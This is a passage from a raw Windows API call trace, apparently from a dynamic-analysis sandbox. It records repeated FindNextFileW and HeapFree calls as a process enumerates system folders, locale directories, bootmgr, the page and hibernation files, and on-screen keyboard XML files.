dwFlags=0x0, lpMem=0x4390058 | out: hHeap=0x680000) returned 1 [0178.410] FindNextFileW (in: hFindFile=0x43a2fd8, lpFindFileData=0x39dfa7c | out: lpFindFileData=0x39dfa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4938cb0, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc495eef9, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0xc495eef9, ftLastWriteTime.dwHighDateTime=0x1d32764, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="sl-SI", cAlternateFileName="")) returned 1 [0178.410] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x4390058 | out: hHeap=0x680000) returned 1 [0178.410] FindNextFileW (in: hFindFile=0x43a2fd8, lpFindFileData=0x39dfa7c | out: lpFindFileData=0x39dfa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc495eef9, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0x5168548b, ftLastAccessTime.dwHighDateTime=0x1d3271b, ftLastWriteTime.dwLowDateTime=0x5168548b, ftLastWriteTime.dwHighDateTime=0x1d3271b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="sr-Latn-CS", cAlternateFileName="SR-LAT~1")) returned 1 [0178.410] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x4390058 | out: hHeap=0x680000) returned 1 [0178.410] FindNextFileW (in: hFindFile=0x43a2fd8, lpFindFileData=0x39dfa7c | out: lpFindFileData=0x39dfa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc495eef9, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc495eef9, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0xc495eef9, ftLastWriteTime.dwHighDateTime=0x1d32764, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="sr-Latn-RS", cAlternateFileName="SR-LAT~2")) returned 1 [0178.411] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x4390058 | out: hHeap=0x680000) returned 1 [0178.411] FindNextFileW (in: hFindFile=0x43a2fd8, lpFindFileData=0x39dfa7c | out: lpFindFileData=0x39dfa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc495eef9, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa01adf43, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef6a2250, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="sv-SE", cAlternateFileName="")) returned 1 [0178.411] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x4390058 | out: hHeap=0x680000) returned 1 [0178.411] FindNextFileW (in: hFindFile=0x43a2fd8, lpFindFileData=0x39dfa7c | out: lpFindFileData=0x39dfa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc495eef9, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa0206504, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef6b5aca, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="tr-TR", cAlternateFileName="")) returned 1 [0178.411] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x4390058 | out: hHeap=0x680000) returned 1 [0178.411] FindNextFileW (in: hFindFile=0x43a2fd8, lpFindFileData=0x39dfa7c | out: lpFindFileData=0x39dfa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc495eef9, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa0206a30, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xc495eef9, ftLastWriteTime.dwHighDateTime=0x1d32764, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="uk-UA", cAlternateFileName="")) returned 1 [0178.412] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x4390058 | out: hHeap=0x680000) returned 1 [0178.412] FindNextFileW (in: hFindFile=0x43a2fd8, lpFindFileData=0x39dfa7c | out: lpFindFileData=0x39dfa7c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xef6c9427, ftCreationTime.dwHighDateTime=0x1d3273d, ftLastAccessTime.dwLowDateTime=0xef6c9427, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf2d79a60, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0x1236, dwReserved0=0x0, dwReserved1=0x240000, cFileName="updaterevokesipolicy.p7b", cAlternateFileName="UPDATE~1.P7B")) returned 1 [0178.412] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x4390058 | out: hHeap=0x680000) returned 1 [0178.412] FindNextFileW (in: hFindFile=0x43a2fd8, lpFindFileData=0x39dfa7c | out: lpFindFileData=0x39dfa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc498516b, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa0207675, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x518ea25e, ftLastWriteTime.dwHighDateTime=0x1d3271b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="zh-HK", cAlternateFileName="")) returned 1 [0178.412] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x4390058 | out: hHeap=0x680000) returned 1 [0178.412] FindNextFileW (in: hFindFile=0x43a2fd8, lpFindFileData=0x39dfa7c | out: lpFindFileData=0x39dfa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc498516b, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef6e6901, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xef6e6901, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="zh-TW", cAlternateFileName="")) returned 1 [0178.413] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x4390058 | out: hHeap=0x680000) returned 1 [0178.413] FindNextFileW (in: hFindFile=0x43a2fd8, lpFindFileData=0x39dfa7c | out: lpFindFileData=0x39dfa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc498516b, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef6e6901, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xef6e6901, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="zh-TW", cAlternateFileName="")) returned 0 [0178.413] FindClose (in: hFindFile=0x43a2fd8 | out: hFindFile=0x43a2fd8) returned 1 [0178.413] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x4380050 | out: hHeap=0x680000) returned 1 [0178.413] FindNextFileW (in: hFindFile=0x69a730, lpFindFileData=0x39dfcf8 | out: lpFindFileData=0x39dfcf8*(dwFileAttributes=0x27, ftCreationTime.dwLowDateTime=0xe47a48a8, ftCreationTime.dwHighDateTime=0x1d112ea, ftLastAccessTime.dwLowDateTime=0xef6fa258, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xfb90936b, ftLastWriteTime.dwHighDateTime=0x1d2fa06, nFileSizeHigh=0x0, nFileSizeLow=0x607da, dwReserved0=0x77850000, dwReserved1=0x0, cFileName="bootmgr", cAlternateFileName="")) returned 1 [0178.413] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x43a3070 | out: hHeap=0x680000) returned 1 [0178.413] FindNextFileW (in: hFindFile=0x69a730, lpFindFileData=0x39dfcf8 | out: lpFindFileData=0x39dfcf8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6c2b2eaf, ftCreationTime.dwHighDateTime=0x1d32718, ftLastAccessTime.dwLowDateTime=0xc1969407, ftLastAccessTime.dwHighDateTime=0x1d327d0, ftLastWriteTime.dwLowDateTime=0xc1969407, ftLastWriteTime.dwHighDateTime=0x1d327d0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ESD", cAlternateFileName="")) returned 1 [0178.414] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x43a3070 | out: hHeap=0x680000) returned 1 [0178.414] FindNextFileW (in: hFindFile=0x69a730, lpFindFileData=0x39dfcf8 | out: lpFindFileData=0x39dfcf8*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x7ef2dddf, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x7ef2dddf, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x762f67e4, ftLastWriteTime.dwHighDateTime=0x1d50396, nFileSizeHigh=0x0, nFileSizeLow=0x332fe000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="hiberfil.sys", cAlternateFileName="")) returned 1 [0178.538] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x43a3070 | out: hHeap=0x680000) returned 1 [0178.538] FindNextFileW (in: hFindFile=0x69a730, lpFindFileData=0x39dfcf8 | out: lpFindFileData=0x39dfcf8*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x6e97b025, ftCreationTime.dwHighDateTime=0x1d3275c, ftLastAccessTime.dwLowDateTime=0x6e97b025, ftLastAccessTime.dwHighDateTime=0x1d3275c, ftLastWriteTime.dwLowDateTime=0x779cb26e, ftLastWriteTime.dwHighDateTime=0x1d50396, nFileSizeHigh=0x0, nFileSizeLow=0x28000000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="pagefile.sys", cAlternateFileName="")) returned 1 [0178.538] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x43a3070 | out: hHeap=0x680000) returned 1 [0178.538] FindNextFileW (in: hFindFile=0x69a730, lpFindFileData=0x39dfcf8 | out: lpFindFileData=0x39dfcf8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x17b3dd09, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0x330ca4b, ftLastAccessTime.dwHighDateTime=0x1d5038e, ftLastWriteTime.dwLowDateTime=0x330ca4b, ftLastWriteTime.dwHighDateTime=0x1d5038e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Program Files", cAlternateFileName="PROGRA~1")) returned 1 [0178.539] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x43d5090 | out: hHeap=0x680000) returned 1 [0178.539] FindNextFileW (in: hFindFile=0x43a2c98, lpFindFileData=0x39df800 | out: lpFindFileData=0x39df800*(dwFileAttributes=0x30, ftCreationTime.dwLowDateTime=0x17b3dd09, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa04663f2, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x4accd6e1, ftLastWriteTime.dwHighDateTime=0x1d327e9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="microsoft shared", cAlternateFileName="MICROS~1")) returned 1 [0178.543] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x43e5098 | out: hHeap=0x680000) returned 1 [0178.543] FindNextFileW (in: hFindFile=0x43a2ad8, lpFindFileData=0x39df584 | out: lpFindFileData=0x39df584*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b3dd09, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xb3e1c92c, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xb3e1c92c, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="ink", cAlternateFileName="")) returned 1 [0178.546] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x43f50a0 | out: hHeap=0x680000) returned 1 [0178.546] FindNextFileW (in: hFindFile=0x43a2e58, lpFindFileData=0x39df308 | out: lpFindFileData=0x39df308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b63f64, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa0553f37, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a32dfff, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="bg-BG", cAlternateFileName="")) returned 1 [0178.546] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x43f50a0 | out: hHeap=0x680000) returned 1 [0178.546] FindNextFileW (in: hFindFile=0x43a2e58, lpFindFileData=0x39df308 | out: lpFindFileData=0x39df308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7d126e12, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0xe46546cb, ftLastAccessTime.dwHighDateTime=0x1d2a058, ftLastWriteTime.dwLowDateTime=0xe46546cb, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0x69a5, dwReserved0=0x0, dwReserved1=0x0, cFileName="Content.xml", cAlternateFileName="")) returned 1 [0178.547] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x43f50a0 | out: hHeap=0x680000) returned 1 [0178.547] FindNextFileW (in: hFindFile=0x43a2e58, lpFindFileData=0x39df308 | out: lpFindFileData=0x39df308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b63f64, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa05550d5, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a32dfff, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="da-DK", cAlternateFileName="")) returned 1 [0178.547] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x43f50a0 | out: hHeap=0x680000) returned 1 [0178.547] FindNextFileW (in: hFindFile=0x43a2e58, lpFindFileData=0x39df308 | out: lpFindFileData=0x39df308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b63f64, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa0555b2c, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a32dfff, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="de-DE", cAlternateFileName="")) returned 1 [0178.547] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x43f50a0 | out: hHeap=0x680000) returned 1 [0178.547] FindNextFileW (in: hFindFile=0x43a2e58, lpFindFileData=0x39df308 | out: lpFindFileData=0x39df308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b63f64, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa055662c, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a32dfff, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="el-GR", cAlternateFileName="")) returned 1 [0178.547] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x43f50a0 | out: hHeap=0x680000) returned 1 [0178.547] FindNextFileW (in: hFindFile=0x43a2e58, lpFindFileData=0x39df308 | out: lpFindFileData=0x39df308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b63f64, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa0557085, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a32dfff, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-GB", cAlternateFileName="")) returned 1 [0178.548] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x43f50a0 | out: hHeap=0x680000) returned 1 [0178.548] FindNextFileW (in: hFindFile=0x43a2e58, lpFindFileData=0x39df308 | out: lpFindFileData=0x39df308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b63f64, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa05dd09d, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xe8231541, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0178.549] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x43f50a0 | out: hHeap=0x680000) returned 1 [0178.549] FindNextFileW (in: hFindFile=0x43a2e58, lpFindFileData=0x39df308 | out: lpFindFileData=0x39df308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b63f64, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa05ddf5c, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a32dfff, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="es-ES", cAlternateFileName="")) returned 1 [0178.549] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x43f50a0 | out: hHeap=0x680000) returned 1 [0178.549] FindNextFileW (in: hFindFile=0x43a2e58, lpFindFileData=0x39df308 | out: lpFindFileData=0x39df308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b63f64, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa05dea14, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a32dfff, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="es-MX", cAlternateFileName="")) returned 1 [0178.549] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x43f50a0 | out: hHeap=0x680000) returned 1 [0178.549] FindNextFileW (in: hFindFile=0x43a2e58, lpFindFileData=0x39df308 | out: lpFindFileData=0x39df308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b63f64, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa05df011, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a32dfff, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="et-EE", cAlternateFileName="")) returned 1 [0178.550] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x43f50a0 | out: hHeap=0x680000) returned 1 [0178.550] FindNextFileW (in: hFindFile=0x43a2e58, lpFindFileData=0x39df308 | out: lpFindFileData=0x39df308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b63f64, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa05df7b6, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a32dfff, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="fi-FI", cAlternateFileName="")) returned 1 [0178.550] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x43f50a0 | out: hHeap=0x680000) returned 1 [0178.550] FindNextFileW (in: hFindFile=0x43a2e58, lpFindFileData=0x39df308 | out: lpFindFileData=0x39df308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7c8f49e8, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0xd11f8841, ftLastAccessTime.dwHighDateTime=0x1d2a058, ftLastWriteTime.dwLowDateTime=0xd11f8841, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0x186b84, dwReserved0=0x0, dwReserved1=0x0, cFileName="FlickAnimation.avi", cAlternateFileName="")) returned 1 [0178.550] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x43f50a0 | out: hHeap=0x680000) returned 1 [0178.550] FindNextFileW (in: hFindFile=0x43a2e58, lpFindFileData=0x39df308 | out: lpFindFileData=0x39df308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b63f64, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa06369df, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a32dfff, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="fr-FR", cAlternateFileName="")) returned 1 [0178.550] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x43f50a0 | out: hHeap=0x680000) returned 1 [0178.550] FindNextFileW (in: hFindFile=0x43a2e58, lpFindFileData=0x39df308 | out: lpFindFileData=0x39df308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b63f64, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa0637839, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a354279, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="fsdefinitions", cAlternateFileName="FSDEFI~1")) returned 1 [0178.551] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44250b0 | out: hHeap=0x680000) returned 1 [0178.551] FindNextFileW (in: hFindFile=0x43a2d18, lpFindFileData=0x39df08c | out: lpFindFileData=0x39df08c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e3d5a11, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x3e3d5a11, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x3e3d5a11, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0xd4, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="auxpad.xml", cAlternateFileName="")) returned 1 [0178.551] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44250b0 | out: hHeap=0x680000) returned 1 [0178.551] FindNextFileW (in: hFindFile=0x43a2d18, lpFindFileData=0x39df08c | out: lpFindFileData=0x39df08c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e421ed8, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x3e421ed8, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x3e421ed8, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0xd7, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="insert.xml", cAlternateFileName="")) returned 1 [0178.551] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44250b0 | out: hHeap=0x680000) returned 1 [0178.551] FindNextFileW (in: hFindFile=0x43a2d18, lpFindFileData=0x39df08c | out: lpFindFileData=0x39df08c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e421ed8, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x3e421ed8, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x3e421ed8, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x2b5, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="keypad.xml", cAlternateFileName="")) returned 1 [0178.553] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44250b0 | out: hHeap=0x680000) returned 1 [0178.553] FindNextFileW (in: hFindFile=0x43a2d18, lpFindFileData=0x39df08c | out: lpFindFileData=0x39df08c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e448143, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x3e448143, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x3e448143, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0xadda, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="main.xml", cAlternateFileName="")) returned 1 [0178.553] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44250b0 | out: hHeap=0x680000) returned 1 [0178.553] FindNextFileW (in: hFindFile=0x43a2d18, lpFindFileData=0x39df08c | out: lpFindFileData=0x39df08c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e421ed8, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x3e421ed8, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x3e421ed8, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0xdd, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="oskclearui.xml", cAlternateFileName="")) returned 1 [0178.554] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44250b0 | out: hHeap=0x680000) returned 1 [0178.554] FindNextFileW (in: hFindFile=0x43a2d18, lpFindFileData=0x39df08c | out: lpFindFileData=0x39df08c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e3fbc74, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x3e3fbc74, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x3e3fbc74, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0xd7, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="oskmenu.xml", cAlternateFileName="")) returned 1 [0178.554] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44250b0 | out: hHeap=0x680000) returned 1 [0178.554] FindNextFileW (in: hFindFile=0x43a2d18, lpFindFileData=0x39df08c | out: lpFindFileData=0x39df08c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e3fbc74, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x3e3fbc74, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x3e3fbc74, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0xd5, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="osknav.xml", cAlternateFileName="")) returned 1 [0178.554] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44250b0 | out: hHeap=0x680000) returned 1 [0178.554] FindNextFileW (in: hFindFile=0x43a2d18, lpFindFileData=0x39df08c | out: lpFindFileData=0x39df08c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e421ed8, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x3e421ed8, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x3e421ed8, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0xdb, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="osknumpad.xml", cAlternateFileName="")) returned 1 [0178.555] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44250b0 | out: hHeap=0x680000) returned 1 [0178.555] FindNextFileW (in: 